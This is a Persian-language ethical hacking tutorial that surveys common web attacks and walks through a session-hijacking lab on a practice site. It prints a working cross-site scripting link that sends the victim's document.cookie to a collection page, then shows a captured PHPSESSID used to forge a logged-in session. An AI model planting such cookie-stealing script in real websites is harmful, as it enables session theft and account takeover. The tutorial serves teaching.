درود بر شما عزیزان و کاربران سایت پی وی لرن. با آموزش رایگان هک قانونمند در خدمتتون هستیم.
از جلسه ی قبل آموزش روش هک کردن یک وبسایت رو آغاز نمودیم. توضیحات مربوط به حملات به وبسایت ها و راه های جلوگیری از آن بیان شد. در قسمت دوم روش هک کردن یک وبسایت رو به صورت یک فعالیت هک عملی خواهیم داشت. با این قسمت از آموزش نیز با ما همراه باشید.
تهدیدات رایج برنامه های وب شامل حملات SQL Injection که هدفش بایپس الگوریتم های ورود، خرابکاری داده ها، حملات Denial of Service که شامل قطع دسترسی کاربران مجاز به منابع، Cross Site Scripting XSS که موضوع فعالیت هک ما در این قسمت است و هدفش تزریق کد است. حمله ی Cookie/Session Poisoning باعث دسترسی غیرمجاز می شود.Form Tampering هدف این حمله این است که داده های فرم مانند قیمت ها در برنامه های تجارت الکترونیک را تغییر دهد تا مهاجم بتواند اقلام را با قیمت های پایین دریافت کند. در حمله ی Code Injection کد هایی مانند PHP، Python و غیره تزریق و اطلاعات حساس را افشا می کند. و در آخر حمله ی Defacement که صفحه را در یک وبسایت تغییر می دهد و تمام درخواست های کاربران را صفحه ای که حاوی پیام مهاجم است، هدایت می کند.
کاربران عزیز برای درک بیش تر مباحث روش هک کردن یک وبسایت و توضیحات بیش تر در مورد حملات توصیه می شود مطالب بیان شده در جلسه ی قبل رو نیز مرور نمایید.
در این سناریو عملی، به ربودن نشست کاربر از برنامه های وب واقع در www.techpanda.org می پردازیم. ما از اسکریپت های متقابل سایت برای خواندن شناسه ی نشست کوکی ها استفاده خواهیم کرد و سپس از آن برای جعل نشست کاربر مجاز استفاده می کنیم.
فرض بر این است که مهاجم به برنامه وب دسترسی دارد و می خواهد جلسات کاربران دیگر که از یک برنامه کاربردی مشابه استفاده می کنند را بردارد. هدف این حمله می تواند به دست آوردن دسترسی مدیر به برنامه وب باشد، فرض بر این است که دسترسی مهاجم محدود است.
<a href=# onclick=\”document.location=\’http://techpanda.org/snatch_sess_id.php?c=\’+escape\(document.cookie\)\;\”>Dark</a>
کد بالا از JavaScript استفاده می کند. این یک لینک با یک رویداد onclick می افزاید. هنگامی که کاربر لینک را کلیک می کند، این رویداد ID جلسه ی کوکی PHP را بازیابی می کند و آن را به صفحه snatch_sess_id.php همراه با ID جلسه در URL می فرستد.
توجه: اسکریپت می تواند مقدار را به یک سرور از راه دور که PHPSESSID در آن ذخیره شده است ارسال کند و سپس کاربر به وب سایت هدایت می شود، در صورتی که هیچ چیز اتفاق نیفتاده باشد.
توجه: مقداری که شما خواهید دید می تواند متفاوت از مقدار در این آموزش باشد، اما مفهوم یکسان است.
نمودار فلوچارت زیر مراحلی را که باید برای تکمیل این تمرین انجام دهید نشان می دهد.
PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
توجه: ما لاگین نکردیم، فقط یک جلسه لاگین به سیستم را با استفاده از مقدار PHPSESSID که با استفاده از cross site scripting بازیابی کردیم، جعل نمودیم.
یک برنامه وب مبتنی بر مدل سرور-مشتری است. طرف سرویس دهنده از مرورگر وب برای دسترسی به منابع در سرور استفاده می کند.
برنامه های کاربردی وب معمولا در اینترنت قابل دسترس هستند. این باعث می شود که آن ها نسبت به حملات آسیب پذیر باشند.
تهدیدات وب برنامه شامل تزریق SQL، تزریق کد، XSS، اختلال، مسمومیت کوکی، و غیره می باشد.
سیاست امنیتی خوب در هنگام توسعه برنامه های کاربردی وب می تواند به آن ها کمک کند.
دوستان گرامی روش هک کردن یک وبسایت رو در دو جلسه توضیح دادیم. در این بخش یک وبسایت رو با روش حمله ی Cross Site Scripting XSS هک نمودیم. همون طور که می دونید هدف این حمله می تواند تزریق کد باشد و همچنین می تواند بر روی مرورگر وب کلاینت اجرا شود. در جلسه ی بعد از سری آموزش های هک قانونمند از سایت آموزشی پی وی لرن با تزریق SQL همراه با مثالی عملی آشنا خواهیم شد. امیدوارم مبحث آموزشی روش هک کردن یک وبسایت مفید بوده و استفاده ی لازم رو از اون برده باشین.
ali
ایمیلی که برای ورود گفتید و رمز را من کپی کردم ولی باز نشد لطفا راهنماییم کیند
ali
مشکل حل شد ممنون
ناشناس
آیا شما سایت هکمیکنید؟
پی وی لرن
با سلام
خیر